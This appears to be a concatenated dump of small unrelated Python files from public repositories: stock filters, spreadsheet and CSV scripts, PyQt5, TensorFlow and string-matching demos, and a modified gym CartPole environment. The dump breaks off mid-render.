返回结果\n return security_list\n\n\n## 过滤ST股票\ndef st_filter(context, security_list):\n if g.only_st:\n current_data = get_current_data()\n security_list = [stock for stock in security_list if current_data[stock].is_st]\n else:\n if g.filter_st:\n current_data = get_current_data()\n security_list = [stock for stock in security_list if not current_data[stock].is_st]\n # 返回结果\n return security_list\n\n# 过滤涨停股票\ndef high_limit_filter(context, security_list):\n current_data = get_current_data()\n security_list = [stock for stock in security_list if not (current_data[stock].day_open >= current_data[stock].high_limit)]\n # 返回结果\n return security_list\n\n# 获取股票股票池\ndef get_security_universe(context, security_universe_index, security_universe_user_securities):\n temp_index = []\n for s in security_universe_index:\n if s == 'all_a_securities':\n temp_index += list(get_all_securities(['stock'], context.current_dt.date()).index)\n else:\n temp_index += get_index_stocks(s)\n for x in security_universe_user_securities:\n temp_index += x\n return sorted(list(set(temp_index)))\n\n# 行业过滤\ndef industry_filter(context, security_list, industry_list):\n if len(industry_list) == 0:\n # 返回股票列表\n return security_list\n else:\n securities = []\n for s in industry_list:\n temp_securities = get_industry_stocks(s)\n securities += temp_securities\n security_list = [stock for stock in security_list if stock in securities]\n # 返回股票列表\n return security_list\n\n# 概念过滤\ndef concept_filter(context, security_list, concept_list):\n if len(concept_list) == 0:\n return security_list\n else:\n securities = []\n for s in concept_list:\n temp_securities = get_concept_stocks(s)\n securities += temp_securities\n security_list = [stock for stock in security_list if stock in securities]\n # 返回股票列表\n return security_list\n\n#自定义函数","repo_name":"linbirg/qt","sub_path":"high_roe.py","file_name":"high_roe.py","file_ext":"py","file_size_in_byte":15658,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"28321680057","text":"import csv\n\n\ndef refine_label():\n\trows = []\n\twith open('processed_0_prepare.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\ti = -1\n\t\tfor row in reader:\n\t\t\ti += 1\n\t\t\tif i == 0:\n\t\t\t\trows.append(row)\n\t\t\t\tcontinue\n\t\t\tif row[1] == '62':\n\t\t\t\trow[1] = 0\n\t\t\telif row[1] == '42':\n\t\t\t\trow[1] = 1\n\t\t\telif row[1] == '55':\n\t\t\t\trow[1] = 2\n\t\t\telif row[1] == '63':\n\t\t\t\trow[1] = 3\n\t\t\telif row[1] == '71':\n\t\t\t\trow[1] = 4\n\t\t\trows.append(row)\n\t\n\twith open('processed_0.csv', 'w') as f_write:\n\t\tcsv_writer = csv.writer(f_write)\n\t\tfor row in rows:\n\t\t\tcsv_writer.writerow(row)\n\nif __name__ == \"__main__\":\n\tprocess()","repo_name":"SOCR/DataSifter","sub_path":"example/refine_label.py","file_name":"refine_label.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"20840617970","text":"import openpyxl\n\nfile = openpyxl.load_workbook(\"Book1.xlsx\")\n\nproduct_list = file[\"Sheet1\"]\n\n# here we are making dictionaries for total value and product per supplier\nproducts_per_supplier = {}\ntotal_value_per_supplier = {}\nproducts_less_100 = {}\n\n# here we are iterate excel file rows one by one using for loop\nfor product_row in range(2, product_list.max_row+1):\n supplier_name = product_list.cell(product_row, 4).value\n price = product_list.cell(product_row, 3).value\n inventory = product_list.cell(product_row, 2).value\n prod_num = product_list.cell(product_row, 1).value\n inventory_price = product_list.cell(product_row, 5)\n\n if supplier_name in products_per_supplier:\n curr_num_products = products_per_supplier.get(supplier_name)\n products_per_supplier[supplier_name] = curr_num_products+1\n else:\n print(\"new added\")\n products_per_supplier[supplier_name] = 1\n\n # calculation total value inventory per supplier\n if supplier_name in total_value_per_supplier:\n curr_supplier_value = total_value_per_supplier.get(supplier_name)\n total_value_per_supplier[supplier_name] = curr_supplier_value + (inventory * price)\n else:\n total_value_per_supplier[supplier_name] = inventory * price\n\n # to find inventory product number which have less than 100\n if inventory < 100:\n products_less_100[prod_num] = inventory\n\n # to add multiplication of inventory and price in excel sheet\n\n inventory_price.value = inventory * price\n\n\nprint(products_per_supplier)\nprint(total_value_per_supplier)\nprint(products_less_100)\n\n\nfile.save(\"Sheet2.xlsx\")\n\nprint(\"EOP\")\n","repo_name":"ArpitVadariya/PythonD","sub_path":"Automation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8876307590","text":"import matplotlib.pyplot as plt\nfrom dotenv import load_dotenv\nimport os\nimport numpy as np\n\nimport rfinder.data.converter as dc\nimport rfinder.plot.utils as pu\nfrom rfinder.config import Config\nfrom rfinder.plot.sigmf_utils import full_sigmf_ax\n\nload_dotenv() # take environment variables from .env.\n\ninput_dir = os.getenv('TRAIN_DIR')+'/'\nconfig = Config()\n\n# filename = 'west-wideband-modrec-ex1-tmpl2-20.04.sigmf-meta'\n# filename = 'west-wideband-modrec-ex69-tmpl10-20.04.sigmf-meta'\nfilename='west-wideband-modrec-ex6-tmpl13-20.04.sigmf-meta'\n\n\nNFFT=1024\nimg_w = 512\nimg_h = 512\n\nimgs, labels = dc.sigmf_to_labelled_images(input_dir+filename, NFFT=NFFT, noverlap=NFFT//2, img_w=img_w, img_h=img_h)\n\nimgs_maxs = [np.max(img) for img in imgs]\nvmax = max(imgs_maxs)\nimgs_mins = [np.min(img) for img in imgs]\nvmin = min(imgs_mins)\n\nimg_label_iter = zip(imgs, labels)\ncolor = config.plotting.color['label']\n\ntry:\n while True:\n fig, axs = plt.subplots(NFFT//img_w, NFFT//img_h)\n for ax in axs.reshape(-1):\n img, label = next(img_label_iter)\n pu.single_img_ax(ax=ax, img=img, vrange=(vmin,vmax))\n pu.add_center_dot_patch(ax, label, color)\n pu.add_rect_patch(ax, label, color) \n\n plt.show()\n \n\nexcept StopIteration:\n print(\"done all images\")","repo_name":"nsbruce/spawc21-bounding-boxes","sub_path":"plot_split.py","file_name":"plot_split.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34193194311","text":"def factorial(x):\n \"\"\"Find x!.\"\"\"\n if isinstance(x, float):\n fl = int(x)\n if fl != x:\n raise ValueError(\"float arguments must be integral\")\n x = fl\n if x < 0:\n raise ValueError(\"x must be >= 0\")\n res = 1\n for i in range(1, x + 1):\n res *= i\n return res\n","repo_name":"diffoperator/Sypy","sub_path":"module/math/app_math.py","file_name":"app_math.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"66"} +{"seq_id":"33810746251","text":"# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 1983. 08. 09.\r\n@author: Hye-Churn Jang, CMBU Specialist in Korea, VMware [jangh@vmware.com]\r\n'''\r\n\r\nname = 'Deployment' # custom resource name\r\n\r\nsdk = 'vra' # imported SDK at common directory\r\n\r\ninputs = {\r\n 'create': {\r\n 'VraManager': 'constant'\r\n },\r\n 'read': {\r\n },\r\n 'update': {\r\n 'VraManager': 'constant'\r\n },\r\n 'delete': {\r\n 'VraManager': 'constant'\r\n }\r\n}\r\n\r\nproperties = {\r\n 'name': {\r\n 'type': 'string',\r\n 'title': 'Name',\r\n 'recreateOnUpdate': True,\r\n 'description': 'Unique name of deployment'\r\n },\r\n 'projectName': {\r\n 'type': 'string',\r\n 'title': 'Project',\r\n 'recreateOnUpdate': True,\r\n 'description': 'Assigned project' \r\n },\r\n 'itemType': {\r\n 'type': 'string',\r\n 'title': 'Contents Type',\r\n 'enum': [\r\n 'blueprint',\r\n 'catalog'\r\n ],\r\n 'recreateOnUpdate': True,\r\n 'description': 'Contents from blueprint or catalog'\r\n },\r\n 'itemName': {\r\n 'type': 'string',\r\n 'title': 'Contents',\r\n 'recreateOnUpdate': True,\r\n 'description': 'Contents name to deploy'\r\n },\r\n 'inputs': {\r\n 'type': 'object',\r\n 'title': 'Inputs',\r\n 'default': {},\r\n 'description': 'Inputs parameters to deploy'\r\n }\r\n}","repo_name":"HyechurnJang/vRealize","sub_path":"devs/abx/custom_resource/resources/deployment/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"66"} +{"seq_id":"27121122401","text":"\"\"\"\r\nPyQt5 tutorial\r\nThis example shows a QSlider widget.\r\n\"\"\"\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QWidget, QSlider, QLabel, QApplication\r\nfrom PyQt5.QtGui import QPixmap\r\nfrom PyQt5.QtCore import Qt\r\n\r\n\r\n# QSlider是一个带有简单滑块的控件。滑块可以前后拖动。\r\n# 我们可以通过拖动选择一个特定的值。有时使用滑动条比\r\n# 直接输入数字或使用旋转框更加自然。\r\nclass Example(QWidget):\r\n def __init__(self):\r\n super(Example, self).__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n sld = QSlider(Qt.Horizontal, self)\r\n sld.setFocusPolicy(Qt.NoFocus)\r\n sld.setGeometry(30, 40, 100, 30)\r\n sld.valueChanged[int].connect(self.changeValue)\r\n\r\n self.lable = QLabel(self)\r\n self.lable.setPixmap(QPixmap(\"../ICON/add.png\"))\r\n self.lable.setGeometry(160, 40, 80, 30)\r\n\r\n self.setGeometry(300, 300, 280, 170)\r\n self.setWindowTitle('Toggle dialog')\r\n self.show()\r\n\r\n # 根据滑动条的值来设置标签的图像。\r\n def changeValue(self, value):\r\n if value == 0:\r\n self.lable.setPixmap(QPixmap(\"../ICON/back.png\"))\r\n elif 0 < value <= 30:\r\n self.lable.setPixmap(QPixmap(\"../ICON/bottom.png\"))\r\n elif 30 < value < 80:\r\n self.lable.setPixmap(QPixmap(\"../ICON/call-start.png\"))\r\n else:\r\n self.lable.setPixmap(QPixmap(\"../ICON/call-stop.png\"))\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n sys.exit(app.exec_())\r\n","repo_name":"dlinzhao/PyQt5-Example","sub_path":"chapter_7/pyqt7_3.py","file_name":"pyqt7_3.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"2907496347","text":"from datetime import date\nfrom dateutil import parser\ntoday = date.today()\nPESEL = str(input(\"Podaj swój numer PESEL: \"))\nprint(PESEL[0:6])\n\n#obliczamy wiek\nrok_urodzenia = int(\"19\" + PESEL[0:2])\ndata_urodzenia = (\"19\" + PESEL[0:2] + \"-\" + PESEL[2:4] + \"-\" + PESEL[4:6])\nx = parser.parse(data_urodzenia)\nprint(x)\nwiek = today - x\nprint(today)\nprint(wiek)","repo_name":"GlinkaG/pp1","sub_path":"02-ControlStructures/Zad34(proba).py","file_name":"Zad34(proba).py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"pl","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"42369941666","text":"# Sorting\n\ndef bubble(items):\n for i in range(len(items)):\n for j in range(len(items)-i-1):\n\n if items[j] > items[j+1]: items[j],items[j+1]=items[j+1],items[j]\n\ndef sort(items,):\n\n mid=len(items)/2\n left=items[:mid]\n right=items[mid:]\n sort(left)\n sort(right)\n join(left,right)\n\n\n\ndef join(left,right):\n left=[2,6]\n right=[1,7]\n joined=[]\n k=0\n for l,r in zip(left,right):\n if l len(right):\n while (k != len(left)):\n joined[k] = left[k]\n k += 1\n\n\nitems=[6,2,1,7,0,-10]\nbubble(items)\nprint(items)\n\n","repo_name":"ShiveeUSF/MyProjects","sub_path":"Problem_Solving/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"28153315746","text":"import unittest\n\nclass Solution:\n def naive_matching(self,t, p):\n m, n = len(p), len(t)\n i = j = 0\n while i < n and j < m:\n if t[i] == p[j]:\n i, j = i + 1, j + 1\n else:\n j, i = 0, i - j + 1\n if j >= m:\n return n - i\n else:\n return -1\n\n\n def naive_matching2(self, t, p):\n \"\"\"\n 从匹配字符串中循环截区模式字符串的长度,如果截取的字符串和模式字符串相等即可认为匹配\n \"\"\"\n len_p = len(p)\n last_index = len(t) - len(p)\n\n if last_index < 0:\n return -1\n\n for i in range(last_index):\n if t[i:len_p+i] == p:\n return i\n\n return -1\n\n\n\nclass TestSolution(unittest.TestCase):\n def setUp(self):\n self.solution = Solution()\n \n\n def test_naive_matching(self):\n t = 'ababab'\n p = 'ba'\n result = self.solution.naive_matching(t, p)\n self.assertEqual(3, result)\n\n def test_naive_matching2(self):\n t = 'aaabbbccc'\n p = 'a'\n result = self.solution.naive_matching2(t, p)\n self.assertEqual(0, result)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"someonehan/Algorithms","sub_path":"src/DataStructure/stringd/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"73651653655","text":"import tensorflow as tf\n\n# 设置GPU按需增长\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\n\n# 下面是定义一个卷积层的通用方式\ndef conv_relu(kernel_shape, bias_shape):\n # Create variable named \"weights\".\n weights = tf.get_variable(\"weights\", kernel_shape, initializer=tf.random_normal_initializer())\n # Create variable named \"biases\".\n biases = tf.get_variable(\"biases\", bias_shape, initializer=tf.constant_initializer(0.0))\n return None\n\n\ndef my_image_filter():\n # 按照下面的方式定义卷积层,非常直观,而且富有层次感\n with tf.variable_scope(\"conv1\"):\n # Variables created here will be named \"conv1/weights\", \"conv1/biases\".\n relu1 = conv_relu([5, 5, 32, 32], [32])\n with tf.variable_scope(\"conv2\"):\n # Variables created here will be named \"conv2/weights\", \"conv2/biases\".\n return conv_relu([5, 5, 32, 32], [32])\n\n\nwith tf.variable_scope(\"image_filters\") as scope:\n # 下面我们两次调用 my_image_filter 函数,但是由于引入了 变量共享机制\n # 可以看到我们只是创建了一遍网络结构。\n result1 = my_image_filter()\n scope.reuse_variables()\n result2 = my_image_filter()\n\n# 看看下面,完美地实现了变量共享!!!\nvs = tf.trainable_variables()\nprint('There are %d train_able_variables in the Graph: ' % len(vs))\nfor v in vs:\n print(v)\n","repo_name":"lvjianjunljj/deep_learning_study","sub_path":"tensorflow_study/getting_started/g_name_variable_scope/experiment_2_2.py","file_name":"experiment_2_2.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22761165087","text":"import os\n\nimport numpy\nfrom arq import ARQ as SimulationModule\nfrom arq import Configuration as Conf\n\n\ndef main():\n turns, file_name, message_length = Conf.configure_simulation()\n\n print(\"\\nRozpoczynam symulacje...\")\n arq_system = SimulationModule.ARQ()\n for i in range(0, turns):\n\n if i % (turns*0.05) == 0:\n print(str(i/(turns*0.05)*5)+\"%\\t(\"+str(i)+\"/\"+str(turns)+\")\")\n\n arq_system.simulate_transmission(message_length)\n arq_system.save_results(file_name)\n\n os.system('cls')\n print(\"Zapisano\", turns, \"wyników do\", file_name+\".csv\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"walig-here/niduc-projekt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74218919256","text":"\"\"\"\r\nClassic cart-pole system implemented by Rich Sutton et al.\r\nCopied from http://incompleteideas.net/sutton/book/code/pole.c\r\npermalink: https://perma.cc/C9ZM-652R\r\n\"\"\"\r\n\r\nimport math\r\nimport gym\r\nfrom gym import spaces, logger\r\nfrom gym.utils import seeding\r\nimport numpy as np\r\n\r\n\r\nclass CartPoleEnvContiReward(gym.Env):\r\n \"\"\"\r\n Description:\r\n A pole is attached by an un-actuated joint to a cart, which moves along\r\n a frictionless track. The pendulum starts upright, and the goal is to\r\n prevent it from falling over by increasing and reducing the cart's\r\n velocity.\r\n\r\n Source:\r\n This environment corresponds to the version of the cart-pole problem\r\n described by Barto, Sutton, and Anderson\r\n\r\n Observation:\r\n Type: Box(4)\r\n Num Observation Min Max\r\n 0 Cart Position -4.8 4.8\r\n 1 Cart Velocity -Inf Inf\r\n 2 Pole Angle -0.418 rad (-24 deg) 0.418 rad (24 deg)\r\n 3 Pole Angular Velocity -Inf Inf\r\n\r\n Actions:\r\n Type: Discrete(2)\r\n Num Action\r\n 0 Push cart to the left\r\n 1 Push cart to the right\r\n\r\n Note: The amount the velocity that is reduced or increased is not\r\n fixed; it depends on the angle the pole is pointing. This is because\r\n the center of gravity of the pole increases the amount of energy needed\r\n to move the cart underneath it\r\n\r\n Reward:\r\n Reward is cos(x*pi/(2L))² for every step taken, -100 for the termination step\r\n\r\n Starting State:\r\n All observations are assigned a uniform random value in [-0.05..0.05]\r\n\r\n Episode Termination:\r\n Pole Angle is more than 12 degrees.\r\n Cart Position is more than 2.4 (center of the cart reaches the edge of\r\n the display).\r\n Episode length is greater than 200.\r\n Solved Requirements:\r\n Considered solved when the average return is greater than or equal to\r\n 195.0 over 100 consecutive trials.\r\n \"\"\"\r\n\r\n metadata = {\r\n 'render.modes': ['human', 'rgb_array'],\r\n 'video.frames_per_second': 50\r\n }\r\n\r\n def __init__(self, cyclic_boundary=False, auto_reset=True,\r\n show_arrows=True):\r\n \"\"\"\r\n cyclic_boundary -- If true, hitting a wall on one side teleport the\r\n cart to the other side.\r\n auto_reset -- If true, the environment automatically reset if the cart\r\n hit a wall of the pole fall, without\r\n causing termination.\r\n show_arrows -- plot arrow showing angular and linear velocity in the\r\n render.\r\n \"\"\"\r\n self.cyclic_boundary = cyclic_boundary\r\n self.show_arrows = show_arrows\r\n self.gravity = 9.8\r\n self.masscart = 1.0\r\n self.masspole = 0.1\r\n self.total_mass = (self.masspole + self.masscart)\r\n self.length = 0.5 # actually half the pole's length\r\n self.polemass_length = (self.masspole * self.length)\r\n self.force_mag = 10.0\r\n self.tau = 0.02 # seconds between state updates\r\n self.kinematics_integrator = 'euler'\r\n self.auto_reset = auto_reset\r\n\r\n\r\n\r\n # Angle at which to fail the episode\r\n self.theta_threshold_radians = 12 * 2 * math.pi / 360\r\n self.x_threshold = 2.4\r\n\r\n self._max_episode_steps = 10000\r\n\r\n # Angle limit set to 2 * theta_threshold_radians so failing observation\r\n # is still within bounds.\r\n high = np.array([self.x_threshold * 2,\r\n np.finfo(np.float32).max,\r\n self.theta_threshold_radians * 2,\r\n np.finfo(np.float32).max],\r\n dtype=np.float32)\r\n\r\n self.action_space = spaces.Discrete(2)\r\n self.observation_space = spaces.Box(-high, high, dtype=np.float32)\r\n\r\n self.seed()\r\n self.viewer = None\r\n self.state = None\r\n\r\n self.steps_beyond_done = None\r\n self.step_nb = 0\r\n self.reset()\r\n\r\n def seed(self, seed=None):\r\n self.np_random, seed = seeding.np_random(seed)\r\n return [seed]\r\n\r\n def step(self, action):\r\n err_msg = \"%r (%s) invalid\" % (action, type(action))\r\n assert self.action_space.contains(action), err_msg\r\n self.step_nb +=1\r\n\r\n\r\n x, x_dot, theta, theta_dot = self.state\r\n force = self.force_mag if action == 1 else -self.force_mag\r\n costheta = math.cos(theta)\r\n sintheta = math.sin(theta)\r\n\r\n # For the interested reader:\r\n # https://coneural.org/florian/papers/05_cart_pole.pdf\r\n temp = (force + self.polemass_length * theta_dot ** 2 * sintheta) / self.total_mass\r\n thetaacc = (self.gravity * sintheta - costheta * temp) / (self.length * (4.0 / 3.0 - self.masspole * costheta ** 2 / self.total_mass))\r\n xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass\r\n\r\n if self.kinematics_integrator == 'euler':\r\n x = x + self.tau * x_dot\r\n x_dot = x_dot + self.tau * xacc\r\n theta = theta + self.tau * theta_dot\r\n theta_dot = theta_dot + self.tau * thetaacc\r\n else: # semi-implicit euler\r\n x_dot = x_dot + self.tau * xacc\r\n x = x + self.tau * x_dot\r\n theta_dot = theta_dot + self.tau * thetaacc\r\n theta = theta + self.tau * theta_dot\r\n\r\n if self.cyclic_boundary:\r\n if x > self.x_threshold:\r\n x = -self.x_threshold + 0.1\r\n\r\n if x < -self.x_threshold:\r\n x = self.x_threshold - 0.1\r\n\r\n self.state = (x, x_dot, theta, theta_dot)\r\n\r\n done = bool(\r\n x < -self.x_threshold\r\n or x > self.x_threshold\r\n or theta < -self.theta_threshold_radians\r\n or theta > self.theta_threshold_radians\r\n or self.step_nb > self._max_episode_steps\r\n )\r\n\r\n if done and self.auto_reset:\r\n self.reset()\r\n done =False\r\n\r\n reward = 0.0\r\n if not done:\r\n reward = 1.0\r\n if self.steps_beyond_done is None and done:\r\n # Pole just fell!\r\n self.steps_beyond_done = 0\r\n reward = 1.0\r\n else:\r\n if self.steps_beyond_done == 0:\r\n logger.warn(\r\n \"You are calling 'step()' even though this \"\r\n \"environment has already returned done = True. You \"\r\n \"should always call 'reset()' once you receive 'done = \"\r\n \"True' -- any further steps are undefined behavior.\"\r\n )\r\n self.steps_beyond_done += 1\r\n reward = 0.0\r\n\r\n # reward_theta = (np.cos(theta)+1.0)/2.0\r\n # reward_x = np.cos((x/self.x_threshold)*(np.pi/2))\r\n #\r\n # reward = reward_theta*reward_x\r\n reward = np.cos((x/self.x_threshold)*(np.pi/2))**2\r\n\r\n return np.array(self.state), reward, done, {}\r\n\r\n def reset(self):\r\n self.step_nb = 0\r\n self.state = self.np_random.uniform(low=-0.05, high=0.05, size=(4,))\r\n self.steps_beyond_done = None\r\n return np.array(self.state)\r\n\r\n def set_state(self, new_state, pole_len=None):\r\n self.steps_beyond_done\r\n self.state = new_state\r\n\r\n if pole_len is not None:\r\n self.length = pole_len # actually half the pole's length\r\n self.polemass_length = (self.masspole * self.length)\r\n\r\n\r\n def render(self, mode='human'):\r\n screen_width = 600\r\n screen_height = 400\r\n\r\n world_width = self.x_threshold * 2\r\n scale = screen_width/world_width\r\n carty = 100 # TOP OF CART\r\n polewidth = 10.0\r\n polelen = scale * (2 * self.length)\r\n cartwidth = 50.0\r\n cartheight = 30.0\r\n\r\n #Arrow render param\r\n\r\n pad = 7.0\r\n self.vel_arrow_len = 0\r\n arrowwidth = 10.0\r\n tipwidth = 20.0\r\n\r\n self.theta = 0\r\n\r\n # action taken\r\n\r\n pad_act = 200\r\n\r\n\r\n if self.viewer is None:\r\n from gym.envs.classic_control import rendering\r\n self.viewer = rendering.Viewer(screen_width, screen_height)\r\n l, r, t, b = -cartwidth / 2, cartwidth / 2, cartheight / 2, -cartheight / 2\r\n axleoffset = cartheight / 4.0\r\n\r\n self.track = rendering.Line((0, carty), (screen_width, carty))\r\n self.track.set_color(0, 0, 0)\r\n self.viewer.add_geom(self.track)\r\n\r\n cart = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\r\n cart.set_color(0.0, 0.0, 0.0)\r\n self.carttrans = rendering.Transform()\r\n cart.add_attr(self.carttrans)\r\n self.viewer.add_geom(cart)\r\n self.cart = cart\r\n l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\r\n pole = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\r\n pole.set_color(.8, .6, .4)\r\n self.poletrans = rendering.Transform(translation=(0, axleoffset))\r\n pole.add_attr(self.poletrans)\r\n pole.add_attr(self.carttrans)\r\n self.viewer.add_geom(pole)\r\n\r\n\r\n\r\n if self.show_arrows:\r\n #linear velocity arrow\r\n l, r, t, b = cartwidth + pad, cartwidth + pad+ self.vel_arrow_len, arrowwidth/2, -arrowwidth/2\r\n\r\n lin_arrow_body = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\r\n lin_arrow_body.set_color(0.7, 0.7, 0.7)\r\n lin_arrow_body.add_attr(self.carttrans)\r\n\r\n self.lin_arrow_body =lin_arrow_body\r\n\r\n self.viewer.add_geom(lin_arrow_body)\r\n\r\n t,b, tip = tipwidth/2, -tipwidth/2, np.sqrt(3)*tipwidth/2\r\n\r\n lin_arrow_tip = rendering.FilledPolygon([(r, t), (r+tip, 0), (r, b)])\r\n lin_arrow_tip.set_color(0.7, 0.7, 0.7)\r\n lin_arrow_tip.add_attr(self.carttrans)\r\n self.lin_arrow_tip = lin_arrow_tip\r\n self.viewer.add_geom(lin_arrow_tip)\r\n\r\n #angular velocity arrow body\r\n ang_arrow_len = 0\r\n theta = 0\r\n\r\n od = (np.cos(theta), -np.sin(theta) ) #direction othogonal to the pole\r\n pd = (np.sin(theta), np.cos(theta) ) #pole direciton\r\n L = polelen - polewidth / 2\r\n pt = (L*np.sin(theta), L*np.cos(theta)) #pole tip\r\n\r\n ang_arrow_body = rendering.FilledPolygon([(pt[0]+pad*od[0]+(arrowwidth/2)*pd[0],\r\n pt[1]+pad*od[1]+(arrowwidth/2)*pd[1]),\r\n (pt[0]+(pad+ang_arrow_len)*od[0]+(arrowwidth/2)*pd[0],\r\n pt[1]+(pad+ang_arrow_len)*od[1]+(arrowwidth/2)*pd[1]),\r\n (pt[0]+(pad+ang_arrow_len)*od[0]-(arrowwidth/2)*pd[0],\r\n pt[1]+(pad+ang_arrow_len)*od[1]-(arrowwidth/2)*pd[1]),\r\n (pt[0]+pad*od[0]-(arrowwidth/2)*pd[0],\r\n pt[1]+pad*od[1]-(arrowwidth/2)*pd[1])])\r\n ang_arrow_body.set_color(0.7, 0.7, 0.7)\r\n ang_arrow_body.add_attr(self.carttrans)\r\n self.ang_arrow_body =ang_arrow_body\r\n self.viewer.add_geom(ang_arrow_body)\r\n\r\n #angular velocity arrow tip\r\n ang_arrow_tip = rendering.FilledPolygon([(pt[0]+(pad+ang_arrow_len)*od[0]+(tipwidth/2)*pd[0],\r\n pt[1]+(pad+ang_arrow_len)*od[1]+(tipwidth/2)*pd[1]),\r\n (pt[0]+(pad+ang_arrow_len)*od[0]-(tipwidth/2)*pd[0],\r\n pt[1]+(pad+ang_arrow_len)*od[1]-(tipwidth/2)*pd[1]),\r\n (pt[0]+(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[0],\r\n pt[1]+(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[1])])\r\n ang_arrow_tip.set_color(0.7, 0.7, 0.7)\r\n ang_arrow_tip.add_attr(self.carttrans)\r\n self.ang_arrow_tip = ang_arrow_tip\r\n self.viewer.add_geom(ang_arrow_tip)\r\n\r\n #rest of the environment\r\n self.axle = rendering.make_circle(polewidth/2)\r\n self.axle.add_attr(self.poletrans)\r\n self.axle.add_attr(self.carttrans)\r\n self.axle.set_color(.5, .5, .8)\r\n self.viewer.add_geom(self.axle)\r\n\r\n\r\n self._pole_geom = pole\r\n\r\n if self.state is None:\r\n return None\r\n\r\n x = self.state\r\n\r\n #Edit the arrow geometry\r\n if self.show_arrows:\r\n #linear velocity arrow\r\n self.vel_arrow_len = abs(x[1]*40.0)\r\n #side = int(self.vel_arrow_len >0)\r\n\r\n if x[1]>0:\r\n l, r, t, b = cartwidth/2 + pad, cartwidth/2 + pad+ self.vel_arrow_len, arrowwidth/2, -arrowwidth/2\r\n tip_top,tip_bot, tip_end = tipwidth/2, -tipwidth/2, np.sqrt(3)*tipwidth/2\r\n self.lin_arrow_tip.v = [(r, tip_top), (r+tip_end, 0), (r, tip_bot)]\r\n\r\n else:\r\n l,r,t,b = -cartwidth/2 -pad -self.vel_arrow_len, -cartwidth/2 -pad, arrowwidth/2, -arrowwidth/2\r\n tip_top,tip_bot, tip_end = tipwidth/2, -tipwidth/2, np.sqrt(3)*tipwidth/2\r\n self.lin_arrow_tip.v = [(l, tip_top), (l-tip_end, 0), (l, tip_bot)]\r\n\r\n self.lin_arrow_body.v = [(l, b), (l, t), (r, t), (r, b)]\r\n\r\n #angular velocity arrow\r\n pad += polewidth/2\r\n ang_arrow_len = abs(x[3]*40.0)\r\n theta = x[2]\r\n\r\n od = (np.cos(theta), -np.sin(theta) ) #direction othogonal to the pole\r\n pd = (np.sin(theta), np.cos(theta) ) #pole direciton\r\n L = polelen - polewidth / 2\r\n pt = (L*np.sin(theta), L*np.cos(theta)) #pole tip\r\n if x[3] > 0:\r\n self.ang_arrow_body.v = [(pt[0]+pad*od[0]+(arrowwidth/2)*pd[0],\r\n pt[1]+pad*od[1]+(arrowwidth/2)*pd[1]),\r\n (pt[0]+(pad+ang_arrow_len)*od[0]+(arrowwidth/2)*pd[0],\r\n pt[1]+(pad+ang_arrow_len)*od[1]+(arrowwidth/2)*pd[1]),\r\n (pt[0]+(pad+ang_arrow_len)*od[0]-(arrowwidth/2)*pd[0],\r\n pt[1]+(pad+ang_arrow_len)*od[1]-(arrowwidth/2)*pd[1]),\r\n (pt[0]+pad*od[0]-(arrowwidth/2)*pd[0],\r\n pt[1]+pad*od[1]-(arrowwidth/2)*pd[1])]\r\n self.ang_arrow_tip.v = [(pt[0]+(pad+ang_arrow_len)*od[0]+(tipwidth/2)*pd[0],\r\n pt[1]+(pad+ang_arrow_len)*od[1]+(tipwidth/2)*pd[1]),\r\n (pt[0]+(pad+ang_arrow_len)*od[0]-(tipwidth/2)*pd[0],\r\n pt[1]+(pad+ang_arrow_len)*od[1]-(tipwidth/2)*pd[1]),\r\n (pt[0]+(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[0],\r\n pt[1]+(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[1])]\r\n else:\r\n self.ang_arrow_body.v = [(pt[0]-pad*od[0]+(arrowwidth/2)*pd[0],\r\n pt[1]-pad*od[1]+(arrowwidth/2)*pd[1]),\r\n 